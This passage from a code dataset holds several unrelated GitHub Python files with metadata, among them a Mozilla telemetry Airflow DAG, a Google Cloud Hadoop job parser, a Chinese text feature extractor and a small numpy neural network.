destination_table=\"firefox_desktop_exact_mau28_by_client_count_dimensions_v1\",\n dataset_id=\"telemetry_derived\",\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsmoot_usage_desktop_v2 = bigquery_etl_query(\n task_id='smoot_usage_desktop_v2',\n project_id='moz-fx-data-shared-prod',\n destination_table='smoot_usage_desktop_v2',\n dataset_id='telemetry_derived',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsmoot_usage_desktop_compressed_v2 = bigquery_etl_query(\n task_id='smoot_usage_desktop_compressed_v2',\n project_id='moz-fx-data-shared-prod',\n destination_table='smoot_usage_desktop_compressed_v2',\n dataset_id='telemetry_derived',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsimpleprophet_forecasts_desktop = simpleprophet_forecast(\n task_id=\"simpleprophet_forecasts_desktop\",\n datasource=\"desktop\",\n project_id='moz-fx-data-shared-prod',\n dataset_id='telemetry_derived',\n table_id='simpleprophet_forecasts_desktop_v1',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\ndevtools_panel_usage = bigquery_etl_query(\n task_id=\"devtools_panel_usage\",\n destination_table=\"devtools_panel_usage_v1\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n start_date=datetime(2019, 11, 25),\n dag=dag)\n\n\nsubdag_args = default_args.copy()\nsubdag_args[\"retries\"] = 0\ntask_id = \"bgbb_pred_dataproc\"\nparams = get_dataproc_parameters(\"google_cloud_airflow_dataproc\")\n\nbgbb_pred_dataproc = SubDagOperator(\n task_id=task_id,\n dag=dag,\n subdag=moz_dataproc_pyspark_runner(\n parent_dag_name=dag.dag_id,\n dag_name=task_id,\n job_name=\"bgbb_pred_dataproc\",\n cluster_name=\"bgbb-pred-{{ ds_nodash }}\",\n idle_delete_ttl=\"600\",\n num_workers=10,\n worker_machine_type=\"n1-standard-8\",\n init_actions_uris=[\n \"gs://dataproc-initialization-actions/python/pip-install.sh\"\n ],\n additional_properties={\n \"spark:spark.jars\": \"gs://spark-lib/bigquery/spark-bigquery-latest.jar\"\n },\n additional_metadata={\n \"PIP_PACKAGES\": \"git+https://github.com/wcbeard/bgbb_airflow.git\"\n },\n python_driver_code=\"gs://{}/jobs/bgbb_runner.py\".format(params.artifact_bucket),\n py_args=[\n \"bgbb_pred\",\n \"--submission-date\",\n \"{{ ds }}\",\n \"--model-win\",\n \"90\",\n \"--sample-ids\",\n \"[42]\" if params.is_dev else \"[]\",\n \"--source\",\n \"bigquery\",\n \"--view-materialization-project\",\n params.project_id if params.is_dev else \"moz-fx-data-shared-prod\",\n \"--view-materialization-dataset\",\n \"analysis\",\n \"--bucket-protocol\",\n \"gs\",\n \"--param-bucket\",\n params.output_bucket,\n \"--param-prefix\",\n \"bgbb/params/v1\",\n \"--pred-bucket\",\n params.output_bucket,\n \"--pred-prefix\",\n \"bgbb/active_profiles/v1\",\n ],\n gcp_conn_id=params.conn_id,\n service_account=params.client_email,\n artifact_bucket=params.artifact_bucket,\n storage_bucket=params.storage_bucket,\n default_args=subdag_args,\n ),\n)\n\nbgbb_pred_bigquery_load = SubDagOperator(\n subdag=load_to_bigquery(\n parent_dag_name=dag.dag_id,\n dag_name=\"bgbb_pred_bigquery_load\",\n default_args=default_args,\n dataset=\"bgbb/active_profiles\",\n dataset_version=\"v1\",\n 
p2b_table_alias=\"active_profiles_v1\",\n bigquery_dataset=\"telemetry_derived\",\n ds_type=\"ds\",\n gke_cluster_name=\"bq-load-gke-1\",\n cluster_by=[\"sample_id\"],\n rename={\"submission_date_s3\": \"submission_date\"},\n replace=[\"SAFE_CAST(sample_id AS INT64) AS sample_id\"],\n ),\n task_id=\"bgbb_pred_bigquery_load\",\n dag=dag)\n\nsearch_clients_daily_bigquery = bigquery_etl_query(\n task_id=\"search_clients_daily_bigquery\",\n destination_table=\"search_clients_daily_v8\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"bewu@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bewu@mozilla.com\"],\n dag=dag)\n\nsearch_aggregates_bigquery = bigquery_etl_query(\n task_id=\"search_aggregates_bigquery\",\n destination_table=\"search_aggregates_v8\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"bewu@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bewu@mozilla.com\"],\n dag=dag)\n\nsearch_clients_last_seen = bigquery_etl_query(\n task_id=\"search_clients_last_seen\",\n destination_table=\"search_clients_last_seen_v1\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n depends_on_past=True,\n owner=\"frank@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\"],\n dag=dag)\n\nexperiments_daily_active_clients = bigquery_etl_query(\n task_id=\"experiments_daily_active_clients\",\n destination_table=\"experiments_daily_active_clients_v1\",\n dataset_id=\"telemetry_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"ssuh@mozilla.com\"],\n dag=dag)\n\n\nmain_summary.set_upstream(copy_deduplicate_main_ping)\nmain_summary_export.set_upstream(main_summary)\nclients_daily.set_upstream(main_summary)\nclients_daily_export.set_upstream(clients_daily)\n\naddons.set_upstream(copy_deduplicate_main_ping)\naddon_aggregates.set_upstream(copy_deduplicate_main_ping)\n\nmain_summary_experiments.set_upstream(main_summary)\nmain_summary_experiments.set_upstream(main_summary_experiments_get_experiment_list)\n\nclients_last_seen.set_upstream(clients_daily)\nexact_mau_by_dimensions.set_upstream(clients_last_seen)\nexact_mau_by_client_count_dimensions.set_upstream(clients_last_seen)\nsmoot_usage_desktop_v2.set_upstream(clients_last_seen)\nsmoot_usage_desktop_compressed_v2.set_upstream(smoot_usage_desktop_v2)\nsimpleprophet_forecasts_desktop.set_upstream(exact_mau_by_dimensions)\ndevtools_panel_usage.set_upstream(clients_daily)\n\nbgbb_pred_dataproc.set_upstream(clients_daily)\nbgbb_pred_bigquery_load.set_upstream(bgbb_pred_dataproc)\n\nsearch_clients_daily_bigquery.set_upstream(main_summary)\nsearch_aggregates_bigquery.set_upstream(search_clients_daily_bigquery)\nsearch_clients_last_seen.set_upstream(search_clients_daily_bigquery)\n\nbq_main_events.set_upstream(copy_deduplicate_main_ping)\n\nexperiments_daily_active_clients.set_upstream(clients_daily)\n","repo_name":"emtwo/telemetry-airflow","sub_path":"dags/main_summary.py","file_name":"main_summary.py","file_ext":"py","file_size_in_byte":18248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"27767282039","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport argparse\n\nfrom apitools.base.py import encoding\n\nfrom googlecloudsdk.calliope import arg_parsers\nfrom googlecloudsdk.command_lib.dataproc.jobs import base 
as job_base\nfrom googlecloudsdk.command_lib.dataproc.jobs import util as job_util\n\n\nclass HadoopBase(job_base.JobBase):\n \"\"\"Common functionality between release tracks.\"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Parses command-line arguments specific to submitting Hadoop jobs.\"\"\"\n parser.add_argument(\n '--jars',\n type=arg_parsers.ArgList(),\n metavar='JAR',\n default=[],\n help=('Comma separated list of jar files to be provided to the MR and '\n 'driver classpaths.'))\n parser.add_argument(\n '--files',\n type=arg_parsers.ArgList(),\n metavar='FILE',\n default=[],\n help='Comma separated list of file paths to be provided to the job. '\n 'A file path can either be a path to a local file or a path '\n 'to a file already in a Cloud Storage bucket.')\n parser.add_argument(\n '--archives',\n type=arg_parsers.ArgList(),\n metavar='ARCHIVE',\n default=[],\n help=('Comma separated list of archives to be provided to the job. '\n 'must be one of the following file formats: .zip, .tar, .tar.gz, '\n 'or .tgz.'))\n parser.add_argument(\n 'job_args',\n nargs=argparse.REMAINDER,\n help='The arguments to pass to the driver.')\n parser.add_argument(\n '--properties',\n type=arg_parsers.ArgDict(),\n metavar='PROPERTY=VALUE',\n help='A list of key value pairs to configure Hadoop.')\n parser.add_argument(\n '--properties-file',\n help=job_util.PROPERTIES_FILE_HELP_TEXT)\n parser.add_argument(\n '--driver-log-levels',\n type=arg_parsers.ArgDict(),\n metavar='PACKAGE=LEVEL',\n help=('A list of package to log4j log level pairs to configure driver '\n 'logging. For example: root=FATAL,com.example=INFO'))\n\n @staticmethod\n def GetFilesByType(args):\n \"\"\"Returns a dict of files by their type (jars, archives, etc.).\"\"\"\n return {\n 'main_jar': args.main_jar,\n 'jars': args.jars,\n 'archives': args.archives,\n 'files': args.files}\n\n @staticmethod\n def ConfigureJob(messages, job, files_by_type, logging_config, args):\n \"\"\"Populates the hadoopJob member of the given job.\"\"\"\n hadoop_job = messages.HadoopJob(\n args=args.job_args or [],\n archiveUris=files_by_type['archives'],\n fileUris=files_by_type['files'],\n jarFileUris=files_by_type['jars'],\n mainClass=args.main_class,\n mainJarFileUri=files_by_type['main_jar'],\n loggingConfig=logging_config)\n\n job_properties = job_util.BuildJobProperties(\n args.properties, args.properties_file)\n if job_properties:\n # Sort properties to ensure tests comparing messages not fail on ordering.\n hadoop_job.properties = encoding.DictToAdditionalPropertyMessage(\n job_properties, messages.HadoopJob.PropertiesValue, sort_items=True)\n\n job.hadoopJob = hadoop_job\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/dataproc/jobs/hadoop.py","file_name":"hadoop.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"70937943905","text":"import random\nimport collections\n\n\nclass Player:\n\n def __init__(self, name, probability=0.5, points=0):\n self.name = name\n self.probability = probability\n self.points = points\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n def set_probability(self, probability):\n if 0 <= probability <= 1:\n self.probability = probability\n\n def add_points(self, val):\n self.points += val\n\n def get_points(self):\n return self.points\n\n def get_probability(self):\n return self.probability\n\n\nclass MatrixGame:\n\n def 
__init__(self, amount_of_players, players, main_matrix, award_matrix):\n self.amount_of_players = amount_of_players\n self.players = players\n self.main_matrix = main_matrix\n self.award_matrix = award_matrix\n self.last_game_choices = []\n\n def __str__(self):\n return f'Main matrix: {self.main_matrix}\\nAward matrix: {self.award_matrix}\\nPlayers: {self.players}'\n\n def __repr__(self):\n return f'Main matrix: {self.main_matrix}\\nAward matrix: {self.award_matrix}\\nPlayers: {self.players}'\n\n def get_result(self):\n self.last_game_choices = []\n for player in self.players:\n self.last_game_choices.append(random.choices([0, 1], weights=[player.get_probability(), 1 - player.get_probability()]))\n result = self.main_matrix.copy()\n for i in range(self.amount_of_players):\n choice = self.last_game_choices[i][0]\n result = result[choice]\n return result[0]\n\n def get_winner(self, result):\n result_code = result % self.amount_of_players\n return self.players[result_code]\n\n def get_points(self):\n result = self.award_matrix.copy()\n for i in range(self.amount_of_players):\n choice = self.last_game_choices[i][0]\n result = result[choice]\n return result[0]\n\n def play(self, amount_of_games=1):\n if amount_of_games == 1:\n result = self.get_result()\n winner = self.get_winner(result)\n winner.add_points(self.get_points())\n print(f'The winner is {winner}')\n return winner\n else:\n winners = []\n for i in range(amount_of_games):\n result = self.get_result()\n winner = self.get_winner(result)\n winner.add_points(self.get_points())\n winners.append(winner)\n print(f'Statistics: {collections.Counter(winners)}')\n return winners\n\n\n'''Hard code example'''\n\nplayer1 = Player('Ivan')\nplayer1.set_probability(0.33)\nplayer2 = Player('Kyrill')\nplayer2.set_probability(0.47)\nplayer3 = Player('Naruto')\nplayer3.set_probability(0.82)\n\nplayers = [player1, player2, player3]\n\nmg1 = MatrixGame(3, players, [[[[0], [1]], [[2], [3]]],\n [[[4], [5]], [[6], [7]]]], [[[[0], [0]], [[0], [0]]],\n [[[0], [0]], [[0], [0]]]])\n\nprint(mg1)\nmg1.play()\nmg1.play(1000)\nfor player in players:\n print(f'Player: {player}\\t\\tPoints: {player.get_points()}')\nprint(players)\n\n'''CLI example'''\n\n\ndef generate_matrix_automatically(matrix, n):\n if len(matrix) == 2:\n matrix[0] = generate_matrix_automatically(matrix[0].copy(), n)\n matrix[1] = generate_matrix_automatically(matrix[1].copy(), n)\n return matrix\n else:\n return [random.randint(0, n-1)]\n\n\ndef generate_matrix_manually(matrix, n):\n if len(matrix) == 2:\n matrix[0] = generate_matrix_manually(matrix[0].copy(), n)\n matrix[1] = generate_matrix_manually(matrix[1].copy(), n)\n return matrix\n else:\n val = int(input('Enter the cell: '))\n return [val]\n\n\nn = int(input('Enter the amount of players: '))\ntemplate_matrix = [[], []]\nfor i in range(1, n):\n temp = template_matrix.copy()\n template_matrix = [temp, temp]\nprint(\"Main matrix will be generated automatically\\n\")\nmatrix = generate_matrix_automatically(template_matrix.copy(), n)\nprint(\"Enter award matrix: \")\naward_matrix = generate_matrix_manually(template_matrix.copy(), n)\nplayers = []\nfor i in range(n):\n name = input(f'Enter the name of player number {i + 1}: ')\n probability = float(input(f'Enter the probability of choosing first of two rows for player {name}: '))\n players.append(Player(name, probability))\nmg = MatrixGame(n, players, matrix, award_matrix)\nprint(mg)\nk = int(input('Enter the amount of games: '))\nmg.play(k)\nfor player in players:\n print(f'Player: 
{player}\\t\\tPoints: {player.get_points()}')\nprint(players)\n","repo_name":"HippoMaru/MatrixGame","sub_path":"MatrixGame.py","file_name":"MatrixGame.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25451006365","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 6 03:29:52 2022\n\n@author: cukel\n\nThis should be the file that actually calls scrapy\non each ticker to output results\n\"\"\"\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.utils.project import get_project_settings\nfrom prdriver import PrSpider,geturls,getdatetime\nticker='ABUS'\n\ns = get_project_settings()\ns['FEED_FORMAT']='csv'\ns['FEED_URI']='tester_{0}'.format(ticker)\nprocess = CrawlerProcess(settings={\n 'FEED_FORMAT':'json',\n 'FEED_URI': 'results.json'\n })\n\nprocess.crawl('prdriver',ticker=ticker)\nprocess.start()","repo_name":"cukelarter/Stock-Market-News-Analysis","sub_path":"pr_scrapyact.py","file_name":"pr_scrapyact.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42368373385","text":"#!/usr/bin/env python\n\n\n# this script will predict a binary classification of WMA presence/absence for a new volume rendering video. \n# Input of the model should be the pre-extracted image feature sequence.\n# Output of this script is a spreadsheet that shows per-video/per-study classification results.\n\n# To run this script, type: ./DLWMA_main_4_predict.py\n\nfrom DLWMA_util_make_result_spreadsheet import Build_Spreadsheet\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, CSVLogger\nfrom DLWMA_util_models import ResearchModels\nfrom DLWMA_util_data import DataSet\nfrom DLWMA_util_make_result_spreadsheet import *\nimport argparse\nimport pandas as pd\nimport os\nimport supplement\nimport numpy as np\nimport function_list_VR as ff\ncg = supplement.Experiment() \n\n\ndef test(data_type, data_file, batch_list, model, study_name, seq_length, saved_model=None,\n class_limit=None, image_shape=None, per_patient_analysis = True):\n \n data = DataSet(\n data_file = data_file,\n validation_batch = None,\n seq_length=seq_length,\n architecture = 'InceptionV3',\n class_limit=class_limit\n )\n\n test_data = data.data\n\n # get prediction by each model\n prediction_list = []\n for i in range(0,len(batch_list)):\n rm = ResearchModels(len(data.classes), model, seq_length, 1e-5 ,1e-6,2048, saved_model[i])\n prediction_list_current_batch = []\n for sample in test_data:\n movie_id = sample['video_name']\n # get generator\n p_generator = data.predict_generator(sample, data_type,0)\n\n # predict\n predict_output = rm.model.predict_generator(generator=p_generator,steps = 1)\n if np.argmax(predict_output[0]) == 0: # abnormal = [1,0], normal = [0,1]\n prediction_list_current_batch += [1] # abnormal\n else:\n prediction_list_current_batch += [0] # normal\n \n prediction_list.append(prediction_list_current_batch)\n\n # organize the predictions into a spreadsheet\n build_sheet = Build_Spreadsheet(test_data,prediction_list,batch_list, model, study_name)\n # make per-video result spreadsheet:\n build_sheet.make_per_video_spreadsheet()\n # make per-study result spreadsheet based on per-video result sheet:\n if per_patient_analysis == True:\n per_video_file= pd.read_excel(os.path.join(cg.save_dir,'results', model+ '_' + study_name + '-testing.xlsx'))\n 
build_sheet.make_per_study_spreadsheet(per_video_file)\n\n \ndef main():\n data_file = os.path.join(cg.save_dir,'Patient_List/movie_list_w_classes_w_picked_timeframes_test.xlsx')\n\n # define study name\n study_name = 'trial_1'\n \n # define model architectures\n model = 'lstm'\n\n # define trained models\n # since we did 5-fold cross-validation, we have 5 models. We apply all 5 and take the majority vote.\n batch_list = [0,1,2,3,4]\n epoch_list = ['001','001','001','001','001'] # pick your epochs with highest validation accuracy\n saved_model = []\n for i in range(0,len(batch_list)):\n batch = batch_list[i]\n epoch = epoch_list[batch]\n saved_model.append(os.path.join(cg.save_dir,'models', model + '_'+study_name, 'batch_'+str(batch), model+'-batch'+str(batch)+'-'+epoch+'.hdf5'))\n \n seq_len = 4\n data_type = 'features'\n image_shape = None\n\n test(data_type, data_file,batch_list, model, study_name, seq_length = seq_len,saved_model=saved_model,\n image_shape=image_shape, class_limit=None, per_patient_analysis =True)\n\nif __name__ == '__main__':\n main()","repo_name":"ucsd-fcrl/DL_WMA_by_VR_Final_v_ZC","sub_path":"DLWMA_main_4_predict.py","file_name":"DLWMA_main_4_predict.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"24672329434","text":"import subprocess\nimport collections\nimport csv\nimport os\nimport re\nimport logging\nimport statistics\nimport wordfreq\nimport nltk.tree\n\nfrom nodes.helper import FileOutputNode\nfrom utils import file_utils\nimport config\n\n\nSENTENCE_TOKENS = '.。!?!?'\n\nPOS_TAGS = [\n \"AD\",\"AS\",\"BA\",\"CC\",\"CD\",\"CS\",\"DEC\",\"DEG\",\"DER\",\"DEV\",\"DT\",\"ETC\",\"FW\",\"IJ\",\n \"JJ\",\"LB\",\"LC\",\"M\",\"MSP\",\"NN\",\"NR\",\"NT\",\"OD\",\"ON\",\"P\",\"PN\",\"PU\",\"SB\",\"SP\",\n \"VA\",\"VC\",\"VE\",\"VV\",\"X\",\"XX\",\"URL\"\n]\n\n\nclass MultilangTranscript(object):\n def __init__(self, filepath, out_file, output_parse_dir, cfg_rules):\n self.filepath = filepath\n self.out_file = out_file\n self.output_parse_dir = output_parse_dir\n self.cfg_rules = cfg_rules\n\n self.features = collections.OrderedDict()\n self.pos_tags = []\n self.parse_trees = []\n\n def _ratio(self, a, b):\n \"\"\"Divide but default to 1 if denominator is zero\"\"\"\n if b == 0:\n return 1\n else:\n return a / b\n\n\n def _run_chinese_corenlp(self, filepath):\n self.corenlp_out_file = os.path.join(self.output_parse_dir, os.path.basename(filepath) + '.out')\n\n if not os.path.isfile(self.corenlp_out_file):\n # lexparser_chinese.sh [output_dir] [transcript_file]\n subprocess.call([\n os.path.join(config.path_to_stanford_cp, 'lexparser_chinese.sh'),\n self.output_parse_dir,\n filepath\n ])\n\n def _parse_corenlp_output(self):\n with open(self.corenlp_out_file) as f:\n for line in f.readlines():\n line = line[:-1]\n\n match = re.search(r'PartOfSpeech=([A-Z]+)\\]', line)\n if match:\n tag = match.group(1)\n assert(tag in POS_TAGS)\n self.pos_tags.append(tag)\n\n # Count POS tag features\n for pos_tag in POS_TAGS:\n count = 0\n for tag in self.pos_tags:\n if tag == pos_tag:\n count += 1\n self.features['pos_' + pos_tag] = count\n self.features['pos_ratio_' + pos_tag] = self._ratio(count, len(self.pos_tags))\n\n # A few special ones\n self.features['ratio_pronoun_noun'] = self._ratio(self.features['pos_PN'], (self.features['pos_PN'] + self.features['pos_NN']))\n self.features['ratio_noun_verb'] = self._ratio(self.features['pos_NN'], (self.features['pos_NN'] + 
self.features['pos_VV']))\n\n self.features['num_tokens'] = len(self.pos_tags)\n\n\n # Parse constituency trees\n with open(self.corenlp_out_file) as f:\n\n partial_parse_tree = ''\n for line in f.readlines():\n\n # If it starts with '(', then begin a new tree\n if line.startswith('('):\n if len(partial_parse_tree) > 0:\n try:\n parse_tree = nltk.tree.Tree.fromstring(partial_parse_tree)\n self.parse_trees.append(parse_tree)\n except:\n pass\n partial_parse_tree = ''\n\n line = line.strip()\n if line.startswith('('):\n partial_parse_tree += ' ' + line\n\n # Last parse tree\n try:\n parse_tree = nltk.tree.Tree.fromstring(partial_parse_tree)\n self.parse_trees.append(parse_tree)\n except:\n pass\n\n # Parse tree features\n tree_heights = []\n for tree in self.parse_trees:\n tree_heights.append(tree.height())\n self.features['max_tree_height'] = max(tree_heights)\n self.features['mean_tree_height'] = statistics.mean(tree_heights)\n self.features['median_tree_height'] = statistics.median(tree_heights)\n\n # Count CFG rules\n num_cfg_productions = 0\n dtree = collections.defaultdict(int)\n for tree in self.parse_trees:\n for cfg_rule in tree.productions():\n if cfg_rule.is_nonlexical():\n cfg_rule_str = str(cfg_rule).replace(' ', '_')\n dtree[cfg_rule_str] += 1\n num_cfg_productions += 1\n\n for cfg_rule in self.cfg_rules:\n self.features[cfg_rule] = dtree[cfg_rule] / num_cfg_productions\n\n\n def compute_word_frequency_norms(self):\n freqs = []\n for char in self.tokens:\n freq = wordfreq.word_frequency(char, 'zh')\n\n if freq == 0:\n continue\n\n freqs.append(freq)\n\n try:\n self.features['mean_word_frequency'] = statistics.mean(freqs)\n self.features['median_word_frequency'] = statistics.median(freqs)\n except:\n self.features['mean_word_frequency'] = 0\n self.features['median_word_frequency'] = 0\n\n\n def write_features(self, out_file, debug):\n if debug:\n for k, v in self.features.items():\n print(k, v)\n else:\n with open(out_file, 'w') as f:\n csvw = csv.writer(f)\n csvw.writerow(list(self.features.keys()))\n csvw.writerow(list(self.features.values()))\n\n def _calc_ttr(self, text):\n \"\"\"TTR = unique words / all words\"\"\"\n N = len(text)\n V = len(set(text))\n return self._ratio(V, N)\n\n\n def compute_basic_word_stats(self):\n num_sentences = len([x for x in self.tokens if x in SENTENCE_TOKENS])\n num_words = len(self.tokens) - num_sentences\n ttr = self._calc_ttr([x for x in self.tokens if x not in SENTENCE_TOKENS])\n word_lengths = [len(x) for x in self.tokens if x not in SENTENCE_TOKENS]\n\n self.features['num_sentences'] = num_sentences\n self.features['mean_words_per_sentence'] = self._ratio(num_words, num_sentences)\n self.features['ttr'] = ttr\n\n def run(self):\n if file_utils.should_run(self.filepath, self.out_file):\n self.features['FileID'] = self.filepath\n\n with open(self.filepath) as f:\n self.tokens = f.read()\n\n self.compute_basic_word_stats()\n self.compute_word_frequency_norms()\n\n self._run_chinese_corenlp(self.filepath)\n self._parse_corenlp_output()\n self.write_features(self.out_file, debug=False)\n\n\nclass ChineseLex(FileOutputNode):\n def setup(self):\n self.output_parse_dir = os.path.join(self.out_dir, \"stanford_parses\")\n with open(config.chinese_cfg_rules_path) as cfgf:\n self.cfg_rules = list(map(lambda x: x[:-1], cfgf.readlines()))\n\n def run(self, filepath):\n self.log(logging.INFO, \"Starting %s\" % (filepath))\n out_file = self.derive_new_file_path(filepath, \".csv\")\n\n transcript = MultilangTranscript(filepath, out_file, 
self.output_parse_dir, self.cfg_rules)\n        try:\n            transcript.run()\n        except:\n            print('Failed:', filepath)\n\n        self.emit(out_file)\n","repo_name":"SPOClab-ca/COVFEFE","sub_path":"nodes/lexicosyntactic_multi.py","file_name":"lexicosyntactic_multi.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"7"}
+{"seq_id":"31892746737","text":"import sys\narr = [int(sys.stdin.readline()) for _ in range(int(sys.stdin.readline()))]\nstack = []\nstack2 = []\na = 1\nb = 0\nflag = True\nwhile b != len(arr):\n    if (stack2 and stack2[-1] == arr[b]) and arr[b] in stack2:\n        stack.append('-')\n        stack2.pop()\n        b += 1\n    elif stack2 and arr[b] in stack2 and stack2[-1] != arr[b]:\n        flag = False\n        break\n    elif not stack2 or (stack2 and stack2[-1] != arr[b]):\n        stack.append('+')\n        stack2.append(a)\n        a += 1\n    elif stack2 and a == arr[b]:\n        stack.append('+')\n        stack2.append(a)\n        stack.append('-')\n        stack2.pop()\n        a += 1\n        b += 1\n\n\nif stack2 or not flag:\n    print('NO')\nelse:\n    print('\\n'.join(stack))\n","repo_name":"nyeongha/algo","sub_path":"2021-01-15/백준 python3 1874번 스택 수열.py","file_name":"백준 python3 1874번 스택 수열.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"34574426568","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# read and plot kernel\ndata = pd.read_csv(\"kernel.csv\", sep=\";\")\nplt.plot(data.x,data.phi, label=\"lee-yang kernel\")\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"kernel.png\")\nplt.gcf().clear()\n\n# read and plot results\ndata = pd.read_csv(\"results.csv\", sep=\";\")\nplt.plot(data.x,data.eps, label=\"lee-yang eps\")\nplt.plot(data.x,data.L, label=\"lee-yang L\")\nplt.gca().set_ylim([-0.1, 1])\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"results.png\")\nplt.gcf().clear()\n\n# read and plot cfunc\ndata = pd.read_csv(\"cfunc.csv\", sep=\";\")\nplt.plot(data.r,data.c, label=\"lee-yang c-func\")\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"cfunc.png\")\nplt.gcf().clear()\n\n","repo_name":"allefabbri/tba-solver","sub_path":"examples/ex01_leeyang/ex01_leeyang_view.py","file_name":"ex01_leeyang_view.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34555892405","text":"import numpy as np\nfrom tools import *\nclass BPNeuralNetwork:  # BP neural network class\n    def __init__(self):  # initialization\n        self.input_n = 0\n        self.hidden_n = 0\n        self.output_n = 0\n\n    def setup(self, ni, nh, no):\n        # initialize the number of input, hidden and output units\n        self.input_n = ni\n        self.hidden_n = nh\n        self.output_n = no\n        # initialize the weight matrices\n        self.input_weights = np.mat(np.zeros((self.input_n, self.hidden_n)))\n        self.output_weights = np.mat(np.zeros((self.hidden_n, self.output_n)))\n        # randomly initialize the weights\n        for i in range(self.input_n):\n            for h in range(self.hidden_n):\n                self.input_weights[i,h] = rand(-0.2, 0.2)\n        for h in range(self.hidden_n):\n            for o in range(self.output_n):\n                self.output_weights[h,o] = rand(-2.0, 2.0)\n        # initialize the biases\n        self.input_correction = np.mat(np.zeros((1, self.hidden_n)))\n        self.output_correction = np.mat(np.zeros((1, self.output_n)))\n\n    def predict(self, inputs):\n        # prediction function\n        self.h_in = inputs*self.input_weights\n        for i in range(inputs.shape[0]):\n            self.h_in[i,:] += self.input_correction  # compute the hidden-layer input\n\n        self.h_out = sigmoid(self.h_in)  # compute the hidden-layer output\n\n        self.p_in = self.h_out*self.output_weights\n        for i in range(self.p_in.shape[0]):\n            self.p_in[i,:] += self.output_correction  # compute the output-layer input\n\n        self.p_out = sigmoid(self.p_in)  # compute the output\n        return self.p_out\n\n    def back_propagate(self, case, label, alpha):\n        output_out = self.predict(case)  # forward pass\n        # backward pass\n        self.delta_output = -np.multiply((label-output_out),sigmoid_derivative(self.p_in))  # residual between hidden and output layer\n        self.delta_hidden = np.multiply((self.delta_output*self.output_weights.T),sigmoid_derivative(self.h_in))  # residual between input and hidden layer\n        self.output_weights = self.output_weights - alpha*(self.h_out.T*self.delta_output)  # update the output weights\n        self.output_correction = self.output_correction - np.sum(self.delta_output,axis=0)*(1.0/case.shape[0])  # update the output bias\n        self.input_weights = self.input_weights - alpha*(case.T*self.delta_hidden)  # update the input weights\n        self.input_correction = self.input_correction - np.sum(self.delta_hidden,axis=0)*(1.0/case.shape[0])  # update the input bias\n\n        # compute the current error\n        loss = 0.0\n        for o in range(label.shape[0]):\n            loss += 0.5 * (label[o] - self.p_out[o]) ** 2\n        return loss\n\n    def SGD(self,max_iter,loss_thre,lr,x_train,y_train,x_test,y_test):\n        # train the network with stochastic gradient descent\n        losses = []\n        iters = []\n        flag = 0\n        for i in range(max_iter):\n            ind = np.random.randint(0,x_train.shape[0],1)  # random sampling\n            x = x_train[ind]\n            y = y_train[ind]\n\n            self.back_propagate(case=x,label=y,alpha=lr)  # train the network via backpropagation\n            if i%500==0:  # evaluate performance\n                pre = self.predict(x_test)\n                loss = 0\n                for j in range(pre.shape[0]):\n                    loss += (pre[j,0]-y_test[j])**2\n                loss = loss/pre.shape[0]\n                losses.append(loss)\n                iters.append(i)\n\n                print('after {} iters get loss {} on test data'.format(i,loss))  # log progress\n                if loss < loss_thre:  # target loss reached\n                    print('loss is below threshold, training is done')\n                    return losses,iters\n                if len(losses) > 1 and loss > losses[-2]:  # stop training early to prevent overfitting\n                    flag += 1\n                    if flag > 2:\n                        print('over fitting, training is done')\n                        return losses,iters\n                else:\n                    flag = 0\n\n        print('training is done')\n        return 